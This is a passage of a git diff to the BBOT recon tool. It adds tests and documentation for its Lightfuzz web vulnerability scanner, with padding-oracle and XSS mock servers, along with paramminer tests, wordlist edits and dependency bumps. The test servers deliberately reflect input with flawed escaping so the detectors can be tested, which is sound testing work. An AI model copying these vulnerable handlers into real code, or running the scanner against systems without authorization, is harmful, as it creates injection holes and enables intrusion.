+ + + """ + + if "/decrypt" in request.url and request.method == "POST": + if request.form and request.form["encrypted_data"]: + encrypted_data = request.form["encrypted_data"] + if "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALwAgLKWJi2nWKbh9ag5rnhm" in encrypted_data: + response_content = "Padding error detected" + elif "4GXVGZbo0DTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg" in encrypted_data: + response_content = "DIFFERENT CRYPTOGRAPHIC ERROR" + elif "AAAAAAA" in encrypted_data: + response_content = "YET DIFFERENT CRYPTOGRAPHIC ERROR" + else: + response_content = "Decryption failed" + + return Response(response_content, status=200) + else: + return Response(default_html_response, status=200) + + async def setup_after_prep(self, module_test): + module_test.set_expect_requests_handler(expect_args=re.compile(".*"), request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_extracted = False + cryptographic_parameter_finding = False + padding_oracle_detected = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [encrypted_data] (POST Form" in e.data["description"]: + web_parameter_extracted = True + if e.type == "FINDING": + if ( + e.data["description"] + == "Probable Cryptographic Parameter. Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Detection Technique(s): [Single-byte Mutation] Envelopes: [URL-Encoded]" + ): + cryptographic_parameter_finding = True + + if e.type == "VULNERABILITY": + if ( + e.data["description"] + == "Padding Oracle Vulnerability. Block size: [16] Parameter: [encrypted_data] Parameter Type: [POSTPARAM] Original Value: [dplyorsu8VUriMW/8DqVDU6kRwL/FDk3Q%2B4GXVGZbo0CTh9YX1YvzZZJrYe4cHxvAICyliYtp1im4fWoOa54Zg%3D%3D] Envelopes: [URL-Encoded]" + ): + padding_oracle_detected = True + + assert web_parameter_extracted, "Web parameter was not extracted" + assert cryptographic_parameter_finding, "Cryptographic parameter not detected" + assert padding_oracle_detected, "Padding oracle vulnerability was not detected" + + +class Test_Lightfuzz_XSS_jsquotecontext(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "lightfuzz", "excavate", "paramminer_getparams"] + config_overrides = { + "interactsh_disable": True, + "modules": { + "lightfuzz": {"enabled_submodules": ["xss"]}, + "paramminer_getparams": {"wordlist": tempwordlist(["junk", "input"]), "recycle_words": True}, + }, + } + + def request_handler(self, request): + # Decode the query string + qs = str(request.query_string.decode()) + default_output = """ + +
+ + +
+ + """ + + if "input=" in qs: + # Split the query string to isolate the 'input' parameter + params = qs.split("&") + input_value = None + for param in params: + if param.startswith("input="): + input_value = param.split("=")[1] + break + + if input_value: + # Simulate flawed escaping + sanitized_input = input_value.replace('"', '\\"').replace("'", "\\'") + sanitized_input = sanitized_input.replace("<", "%3C").replace(">", "%3E") + + # Construct the reflected block with the sanitized input + reflected_block = f""" + + + + """ + return Response(reflected_block, status=200) + + return Response(default_output, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["paramminer_getparams"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.monkeypatch.setattr( + helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} + ) + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + web_parameter_emitted = False + xss_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "[Paramminer] Getparam: [input] Reasons: [body] Reflection: [True]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [input] Context: [In Javascript (escaping the escape character, single quote)] Parameter Type: [GETPARAM]": + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER for was not emitted" + assert xss_finding_emitted, "XSS FINDING not emitted" + + +class Test_Lightfuzz_XSS_jsquotecontext_doublequote(Test_Lightfuzz_XSS_jsquotecontext): + def request_handler(self, request): + qs = str(request.query_string.decode()) + default_output = """ + +
+ + +
+ + """ + + if "input=" in qs: + params = qs.split("&") + input_value = None + for param in params: + if param.startswith("input="): + input_value = param.split("=")[1] + break + + if input_value: + # Simulate flawed escaping with opposite quotes + sanitized_input = input_value.replace("'", "\\'").replace('"', '\\"') + sanitized_input = sanitized_input.replace("<", "%3C").replace(">", "%3E") + + reflected_block = f""" + + + + """ + return Response(reflected_block, status=200) + + return Response(default_output, status=200) + + def check(self, module_test, events): + web_parameter_emitted = False + xss_finding_emitted = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "[Paramminer] Getparam: [input] Reasons: [body] Reflection: [True]" in e.data["description"]: + web_parameter_emitted = True + + if e.type == "FINDING": + if "Possible Reflected XSS. Parameter: [input] Context: [In Javascript (escaping the escape character, double quote)] Parameter Type: [GETPARAM]": + xss_finding_emitted = True + + assert web_parameter_emitted, "WEB_PARAMETER for was not emitted" + assert xss_finding_emitted, "XSS FINDING not emitted" diff --git a/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py b/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py index a3acf0e6a9..554d617422 100644 --- a/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py +++ b/bbot/test/test_step_2/module_tests/test_module_paramminer_getparams.py @@ -194,7 +194,10 @@ class TestParamminer_Getparams_xmlspeculative(Paramminer_Headers): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] config_overrides = { - "modules": {"paramminer_getparams": {"wordlist": tempwordlist(["data", "common"]), "recycle_words": False}} + "modules": { + "excavate": {"speculate_params": True}, + "paramminer_getparams": {"wordlist": tempwordlist(["data", "common"]), "recycle_words": False}, + } } getparam_extract_xml = """ diff --git a/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py b/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py index 20499abc06..6ca649510b 100644 --- a/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py +++ b/bbot/test/test_step_2/module_tests/test_module_paramminer_headers.py @@ -27,7 +27,7 @@ class Paramminer_Headers(ModuleTestBase): """ async def setup_after_prep(self, module_test): - module_test.scan.modules["paramminer_headers"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.scan.modules["paramminer_headers"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" module_test.monkeypatch.setattr( helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} ) @@ -108,7 +108,7 @@ class TestParamminer_Headers_extract(Paramminer_Headers): """ async def setup_after_prep(self, module_test): - module_test.scan.modules["paramminer_headers"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.scan.modules["paramminer_headers"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" module_test.monkeypatch.setattr( helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} ) @@ -153,3 +153,47 @@ def check(self, module_test, events): assert not excavate_extracted_web_parameter, ( "Excavate extract WEB_PARAMETER despite disabling parameter extraction" ) + + +class TestParamminer_Headers_NoCookieRetention(Paramminer_Headers): + async def setup_after_prep(self, module_test): + module_test.scan.modules["paramminer_headers"].helpers.rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.monkeypatch.setattr( + helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} + ) + + expect_args = {"headers": {"tracestate": "AAAAAAAAAAAAAA"}} + respond_args = {"response_data": self.headers_body_match} + module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args) + + headers_body_with_cookie = """ + + the title + +

Hello with cookie!

'; + + + """ + expect_args = {"headers": {"Cookie": "test_cookie=cookie_value; AAAAAAAAAAAAAA=AAAAAAAAAAAAAA"}} + respond_args_with_cookie_body_change = {"response_data": headers_body_with_cookie} + module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args_with_cookie_body_change) + + respond_args_default = { + "response_data": self.headers_body, + "headers": {"set-cookie": "test_cookie=cookie_value"}, + } + module_test.set_expect_requests(respond_args=respond_args_default) + + def check(self, module_test, events): + found_web_parameter = False + found_web_parameter_false_positive = False + + for e in events: + if e.type == "WEB_PARAMETER": + if "[Paramminer] Header: [tracestate]" in e.data["description"]: + found_web_parameter = True + if "junkword1" in e.data["description"]: + found_web_parameter_false_positive = True + + assert found_web_parameter, "WEB_PARAMETER event was not emitted" + assert not found_web_parameter_false_positive, "WEB_PARAMETER event was emitted with false positive" diff --git a/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py new file mode 100644 index 0000000000..2a4bf33c29 --- /dev/null +++ b/bbot/test/test_step_2/module_tests/test_module_reflected_parameters.py @@ -0,0 +1,226 @@ +from .base import ModuleTestBase, tempwordlist +from werkzeug.wrappers import Response +import re + +from .test_module_paramminer_getparams import TestParamminer_Getparams +from .test_module_paramminer_headers import helper + + +class TestReflected_parameters_fromexcavate(ModuleTestBase): + targets = ["http://127.0.0.1:8888"] + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + normal_block = 'foo' + qs = str(request.query_string.decode()) + if "reflected=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + reflected_block = f'' + return Response(reflected_block, status=200) + else: + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[GETPARAM] Parameter value reflected in response body. Name: [reflected] Source Module: [excavate] Original Value: [foo]" + for e in events + ) + + +class TestReflected_parameters_headers(TestReflected_parameters_fromexcavate): + modules_overrides = ["httpx", "reflected_parameters", "excavate", "paramminer_headers"] + config_overrides = { + "modules": { + "paramminer_headers": {"wordlist": tempwordlist(["junkword1", "tracestate"]), "recycle_words": True} + } + } + + def request_handler(self, request): + headers = {k.lower(): v for k, v in request.headers.items()} + if "tracestate" in headers: + reflected_value = headers["tracestate"] + reflected_block = f"
{reflected_value}
" + return Response(reflected_block, status=200) + else: + return Response("
", status=200) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[HEADER] Parameter value reflected in response body. Name: [tracestate] Source Module: [paramminer_headers]" + for e in events + ) + + +class TestReflected_parameters_fromparamminer(TestParamminer_Getparams): + modules_overrides = ["httpx", "paramminer_getparams", "reflected_parameters"] + + def request_handler(self, request): + normal_block = "" + qs = str(request.query_string.decode()) + if "id=" in qs: + value = qs.split("=")[1] + if "&" in value: + value = value.split("&")[0] + reflected_block = f'' + return Response(reflected_block, status=200) + else: + return Response(normal_block, status=200) + + async def setup_after_prep(self, module_test): + module_test.scan.modules["paramminer_getparams"].rand_string = lambda *args, **kwargs: "AAAAAAAAAAAAAA" + module_test.monkeypatch.setattr( + helper.HttpCompare, "gen_cache_buster", lambda *args, **kwargs: {"AAAAAA": "1"} + ) + + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and "[GETPARAM] Parameter value reflected in response body. Name: [id] Source Module: [paramminer_getparams]" + in e.data["description"] + for e in events + ) + + +class TestReflected_parameters_with_canary(TestReflected_parameters_fromexcavate): + def request_handler(self, request): + normal_block = 'foo' + qs = str(request.query_string.decode()) + if qs: + # Split the query string into key-value pairs + params = qs.split("&") + # Construct the reflected block with all parameters + reflected_block = '
{reflected_value}
" + return Response(reflected_block, status=200) + else: + return Response("
", status=200) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[COOKIE] Parameter value reflected in response body. Name: [testcookie] Source Module: [paramminer_cookies]" + for e in events + ) + + +class TestReflected_parameters_postparams(TestReflected_parameters_fromexcavate): + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + form_data = request.form + if "testparam" in form_data: + reflected_value = form_data["testparam"] + reflected_block = f"
{reflected_value}
" + return Response(reflected_block, status=200) + else: + form_html = """ + + +
+ + +
+ + + """ + return Response(form_html, status=200) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[POSTPARAM] Parameter value reflected in response body. Name: [testparam] Source Module: [excavate] Original Value: [default_value]" + for e in events + ) + + +class TestReflected_parameters_bodyjson(TestReflected_parameters_fromexcavate): + modules_overrides = ["httpx", "reflected_parameters", "excavate"] + + def request_handler(self, request): + # Ensure the request is expecting JSON data + if request.content_type == "application/json": + json_data = request.json + if "username" in json_data: + reflected_value = json_data["username"] + reflected_block = f"
{reflected_value}
" + return Response(reflected_block, status=200) + # Provide an HTML page with a jQuery AJAX call + jsonajax_extract_html = """ + + +
+ + """ + return Response(jsonajax_extract_html, status=200) + + async def setup_after_prep(self, module_test): + expect_args = re.compile("/") + module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler) + + def check(self, module_test, events): + assert any( + e.type == "FINDING" + and e.data["description"] + == "[BODYJSON] Parameter value reflected in response body. Name: [username] Source Module: [excavate]" + for e in events + ) diff --git a/bbot/wordlists/paramminer_parameters.txt b/bbot/wordlists/paramminer_parameters.txt index 501878d987..9ad334d19c 100644 --- a/bbot/wordlists/paramminer_parameters.txt +++ b/bbot/wordlists/paramminer_parameters.txt @@ -100,7 +100,6 @@ modify rename reset shell -utm_content toggle adm cfg @@ -616,7 +615,6 @@ replace read project Post -PHPSESSID nid md5 map @@ -1532,10 +1530,6 @@ unstick unsecuresubmit unbookmark ua -utm_source -utm_campaign -utm_medium -utm_term typ tv tree @@ -4754,7 +4748,6 @@ pPage pName pMail pDesc -p4ssw0rD p3 p2p p2index @@ -5701,7 +5694,6 @@ dstendport dstbeginport dscp dryrun -droptables drilldown dragtable dragdroporder diff --git a/docs/modules/lightfuzz.md b/docs/modules/lightfuzz.md new file mode 100644 index 0000000000..d10b7186c0 --- /dev/null +++ b/docs/modules/lightfuzz.md @@ -0,0 +1,126 @@ +# Lightfuzz + +*Lightfuzz is currently an experimental feature. There WILL be false positives (and, although we'll never know - false negatives), although the submodules are being actively worked on to reduce them. If you find false positives, please help us out by opening a GitHub issue with the details!* + +## Philosophy + +### What is Lightfuzz? + +Lightfuzz is a lightweight web vulnerability scanner built into BBOT. It is designed to find "low-hanging fruit" type vulnerabilities without much overhead and at massive scale. + +### What is Lightfuzz NOT? + +Lightfuzz is not, does not attempt to be, and will never be, a replacement for a full-blown web application scanner. You should not, for example, be running Lightfuzz as a replacement for Burp Suite scanning. Burp Suite scanner will always find more (even though we can find a few things it can't). + +It will also not help you *exploit* vulnerabilities. It's job is to point out vulnerabilities, or likely vulnerabilities, or potential vulnerabilities, and then pass them off to you. A great deal of the overhead with traditional scanners comes in the confirmation phase, or in testing exploitation payloads. + +So for example, Lightfuzz may detect an XSS vulnerability for you. But its NOT going to help you figure out which tag you need to use to get around a security filter, or give you any kind of a final payload. It's simply going to tell you that the contents of a given GET parameter are being reflected and that it was able to render an unmodified HTML tag. The rest is up to you. + +### False Positives + +Significant work has gone into minimizing false positives. However, due to the nature of how Lightfuzz works, they are a reality. Random hiccups in network connectivity can cause them in some cases, odd WAF behavior can account for others. + +If you see a false positive that you feel is occuring too often or could easily be prevented, please open a GitHub issue and we will take a look! + +### Deadly module + +Lightfuzz currently has the `deadly` flag. This is applied to the most aggressive modules to enforce an additional check, requiring explicit acknowledgement of the risk using the `--allow-deadly` command line flag. + +## Modules + +Lightfuzz is divided into numerous "submodules". These would typically be ran all together, but they can be configured to be run individually or in any desired configuration. This would be done with the aide of a `preset`, more on those in a moment. + +### `cmdi` (Command Injection) + - Finds output-based on blind out-of-band (via `Interactsh`) command injections +### `crypto` (Cryptography) + - Identifies cryptographic parameters that have a tangable effect on the application + - Can identify padding oracle vulnerabilities + - Can identify hash length extention vulnerabilities +### `nosqli` (NoSQL Injection) + - Can identify some NoSQL Injection vulnerabilities +### `path` (Path Traversal) + - Can find arbitrary file read / local-file include vulnerabilities, based on relative path traversal or with absolute paths +### `serial` (Deserialization) + - Can identify the active deserialization of a variety of deserialization types across several platforms +### `sqli` (SQL Injection) + - Error Based SQLi Detection + - Blind time-delay SQLi Detection +### `ssti` (Server-side Template Injection) + - Can find basic server-side template injection +### `xss` (Cross-site Scripting) + - Can find a variety of XSS types, across several different contexts (between-tags, attribute, Javascript-based) +## Presets + +Lightfuzz comes with a few pre-defined presets. The first thing to know is that, unless you really know BBOT inside and out, we recommend using one of them. This because to be successful, Lightfuzz needs to change a lot of very important BBOT settings. These include: + +* Setting `url_querystring_remove` to False. By default, BBOT strips away querystings, so in order to FUZZ GET parameters, that default has to be disabled. +``` +url_querystring_remove: False +``` +* Setting the `excavate` internal module to retain querystrings when it finds new URLs +``` + excavate: + retain_querystring: True +``` +* Enabling several other complimentary modules. Specifically, `hunt` and `reflected_parameters` can be useful companion modules that also be useful when `WEB_PARAMETER` events are being emitted. + + +If you don't want to dive into those details, and we don't blame you, here are the built-in preset options and what you need to know about the differences. + +# -p lightfuzz + +This is the default setting, and it enables all submodules. It changes all of the essential BBOT settings to make Lightfuzz work, without too many extras. However it is important to note that it **DISABLES FUZZING POST REQUESTS**. This is because this type of request is the most intrusive, and the most likely to cause problems, especially if it's ran against an internal network. + +# -p lightfuzz-intense + +* Increases the web spider settings a bit from the default. +* Adds in the **Param Miner** suite of modules to try and find new parameters to fuzz via brute-force +* Enables fuzzing of POST parameters + +# -p lightfuzz-max + +Everything included in `lightfuzz-intense`, plus: + +* Query string collapsing turned OFF. Normally, multiple instances of the same parameter (e.g., foo=bar and foo=bar2) are collapsed into one for fuzzing. With `lightfuzz-max`, each instance is fuzzed individually. +* Force common headers enabled - Fuzz certain common header parameters, even if we didn't discover them +* 'Speculate' GET parameters from JSON or XML response bodies + +These settings aren't typically desired as they add significant time to the scan. + +# -p lightfuzz-xss + +This is a special Lightfuzz preset that focuses entirely on XSS, to make XSS hunting as fast as possible. It is an example of how to make a preset that focuses on specific submodules. It also includes the `paramminer-getparams` module to help find undocumented parameters to fuzz. + +# -p lightfuzz-min + +This preset excludes all extra modules, dials down all the settings, and tests only submodules for the most common vulnerabilities. + +# Spider preset + +We also *strongly* recommend running Lightfuzz with the spider enabled, as this will dramatically increase the number of parameters that are discovered. If you don't, you will see a warning reminding you that things will work a lot better if you do. + +That can be done by simply also enabling either the `spider` or `spider-intense` preset. + +# Usage + +With the presets in mind, usage is incredibly simple. In most cases you will just do the following: + +``` +bbot -p lightfuzz spider -t targets.txt --allow-deadly +``` + +It's really that simple. Almost all output from Lightfuzz will be in the form of a `FINDING`, as opposed to a `VULNERABILITY`, with a couple of exceptions. This is because, as was explained, the nature of the findings are that they are typically unconfirmed and will require work on your part to do so. + +If you wanted a specific submodule, you could make your own preset adjusting the `modules.lightfuzz.enabled_submodules` setting, or do so via the command line: + +Just XSS: +``` +bbot -p lightfuzz -t targets.txt -c modules.lightfuzz.enabled_submodules[xss] --allow-deadly +``` + +XSS and SQLi: +``` +bbot -p lightfuzz -t targets.txt -c modules.lightfuzz.enabled_submodules[xss,sqli] --allow-deadly +``` + + diff --git a/poetry.lock b/poetry.lock index f21dfc610f..0f14d81504 100644 --- a/poetry.lock +++ b/poetry.lock @@ -1,4 +1,4 @@ -# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand. +# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand. [[package]] name = "annotated-types" @@ -577,13 +577,13 @@ test = ["pytest (>=6)"] [[package]] name = "fastapi" -version = "0.115.8" +version = "0.115.9" description = "FastAPI framework, high performance, easy to learn, fast to code, ready for production" optional = false python-versions = ">=3.8" files = [ - {file = "fastapi-0.115.8-py3-none-any.whl", hash = "sha256:753a96dd7e036b34eeef8babdfcfe3f28ff79648f86551eb36bfc1b0bf4a8cbf"}, - {file = "fastapi-0.115.8.tar.gz", hash = "sha256:0ce9111231720190473e222cdf0f07f7206ad7e53ea02beb1d2dc36e2f0741e9"}, + {file = "fastapi-0.115.9-py3-none-any.whl", hash = "sha256:4a439d7923e4de796bcc88b64e9754340fcd1574673cbd865ba8a99fe0d28c56"}, + {file = "fastapi-0.115.9.tar.gz", hash = "sha256:9d7da3b196c5eed049bc769f9475cd55509a112fbe031c0ef2f53768ae68d13f"}, ] [package.dependencies] @@ -701,13 +701,13 @@ zstd = ["zstandard (>=0.18.0)"] [[package]] name = "identify" -version = "2.6.7" +version = "2.6.8" description = "File identification library for Python" optional = false python-versions = ">=3.9" files = [ - {file = "identify-2.6.7-py2.py3-none-any.whl", hash = "sha256:155931cb617a401807b09ecec6635d6c692d180090a1cedca8ef7d58ba5b6aa0"}, - {file = "identify-2.6.7.tar.gz", hash = "sha256:3fa266b42eba321ee0b2bb0936a6a6b9e36a1351cbb69055b3082f4193035684"}, + {file = "identify-2.6.8-py2.py3-none-any.whl", hash = "sha256:83657f0f766a3c8d0eaea16d4ef42494b39b34629a4b3192a9d020d349b3e255"}, + {file = "identify-2.6.8.tar.gz", hash = "sha256:61491417ea2c0c5c670484fd8abbb34de34cdae1e5f39a73ee65e48e4bb663fc"}, ] [package.extras] @@ -1140,13 +1140,13 @@ min-versions = ["babel (==2.9.0)", "click (==7.0)", "colorama (==0.4)", "ghp-imp [[package]] name = "mkdocs-autorefs" -version = "1.3.1" +version = "1.4.0" description = "Automatically link across pages in MkDocs." optional = false python-versions = ">=3.9" files = [ - {file = "mkdocs_autorefs-1.3.1-py3-none-any.whl", hash = "sha256:18c504ae4d3ee7f344369bb26cb31d4105569ee252aab7d75ec2734c2c8b0474"}, - {file = "mkdocs_autorefs-1.3.1.tar.gz", hash = "sha256:a6d30cbcccae336d622a66c2418a3c92a8196b69782774529ad441abb23c0902"}, + {file = "mkdocs_autorefs-1.4.0-py3-none-any.whl", hash = "sha256:bad19f69655878d20194acd0162e29a89c3f7e6365ffe54e72aa3fd1072f240d"}, + {file = "mkdocs_autorefs-1.4.0.tar.gz", hash = "sha256:a9c0aa9c90edbce302c09d050a3c4cb7c76f8b7b2c98f84a7a05f53d00392156"}, ] [package.dependencies] @@ -1229,13 +1229,13 @@ files = [ [[package]] name = "mkdocstrings" -version = "0.28.1" +version = "0.28.2" description = "Automatic documentation from sources, for MkDocs." optional = false python-versions = ">=3.9" files = [ - {file = "mkdocstrings-0.28.1-py3-none-any.whl", hash = "sha256:a5878ae5cd1e26f491ff084c1f9ab995687d52d39a5c558e9b7023d0e4e0b740"}, - {file = "mkdocstrings-0.28.1.tar.gz", hash = "sha256:fb64576906771b7701e8e962fd90073650ff689e95eb86e86751a66d65ab4489"}, + {file = "mkdocstrings-0.28.2-py3-none-any.whl", hash = "sha256:57f79c557e2718d217d6f6a81bf75a0de097f10e922e7e5e00f085c3f0ff6895"}, + {file = "mkdocstrings-0.28.2.tar.gz", hash = "sha256:9b847266d7a588ea76a8385eaebe1538278b4361c0d1ce48ed005be59f053569"}, ] [package.dependencies] @@ -1244,7 +1244,7 @@ Jinja2 = ">=2.11.1" Markdown = ">=3.6" MarkupSafe = ">=1.1" mkdocs = ">=1.4" -mkdocs-autorefs = ">=1.3" +mkdocs-autorefs = ">=1.4" mkdocs-get-deps = ">=0.2" pymdown-extensions = ">=6.3" typing-extensions = {version = ">=4.1", markers = "python_version < \"3.10\""} @@ -1256,19 +1256,19 @@ python-legacy = ["mkdocstrings-python-legacy (>=0.2.1)"] [[package]] name = "mkdocstrings-python" -version = "1.16.1" +version = "1.16.2" description = "A Python handler for mkdocstrings." optional = false python-versions = ">=3.9" files = [ - {file = "mkdocstrings_python-1.16.1-py3-none-any.whl", hash = "sha256:b88ff6fc6a293cee9cb42313f1cba37a2c5cdf37bcc60b241ec7ab66b5d41b58"}, - {file = "mkdocstrings_python-1.16.1.tar.gz", hash = "sha256:d7152d17da74d3616a0f17df5d2da771ecf7340518c158650e5a64a0a95973f4"}, + {file = "mkdocstrings_python-1.16.2-py3-none-any.whl", hash = "sha256:ff7e719404e59ad1a72f1afbe854769984c889b8fa043c160f6c988e1ad9e966"}, + {file = "mkdocstrings_python-1.16.2.tar.gz", hash = "sha256:942ec1a2e0481d28f96f93be3d6e343cab92a21e5baf01c37dd2d7236c4d0bd7"}, ] [package.dependencies] griffe = ">=0.49" -mkdocs-autorefs = ">=1.2" -mkdocstrings = ">=0.28" +mkdocs-autorefs = ">=1.4" +mkdocstrings = ">=0.28.2" typing-extensions = {version = ">=4.0", markers = "python_version < \"3.11\""} [[package]] @@ -1983,13 +1983,13 @@ testing = ["covdefaults (>=2.3)", "coverage (>=7.6.1)", "pytest-mock (>=3.14)"] [[package]] name = "pytest-httpserver" -version = "1.1.1" +version = "1.1.2" description = "pytest-httpserver is a httpserver for pytest" optional = false -python-versions = ">=3.8" +python-versions = ">=3.9" files = [ - {file = "pytest_httpserver-1.1.1-py3-none-any.whl", hash = "sha256:aadc744bfac773a2ea93d05c2ef51fa23c087e3cc5dace3ea9d45cdd4bfe1fe8"}, - {file = "pytest_httpserver-1.1.1.tar.gz", hash = "sha256:e5c46c62c0aa65e5d4331228cb2cb7db846c36e429c3e74ca806f284806bf7c6"}, + {file = "pytest_httpserver-1.1.2-py3-none-any.whl", hash = "sha256:93009d79574fc982301e8494fdea0884f21bb0caf3bcc719151dfbd1e3a943ea"}, + {file = "pytest_httpserver-1.1.2.tar.gz", hash = "sha256:38d0b726580d05c47cbd0ced1ecb36a51668ef1596cdc6d70a9cfa2b3cc00ebd"}, ] [package.dependencies]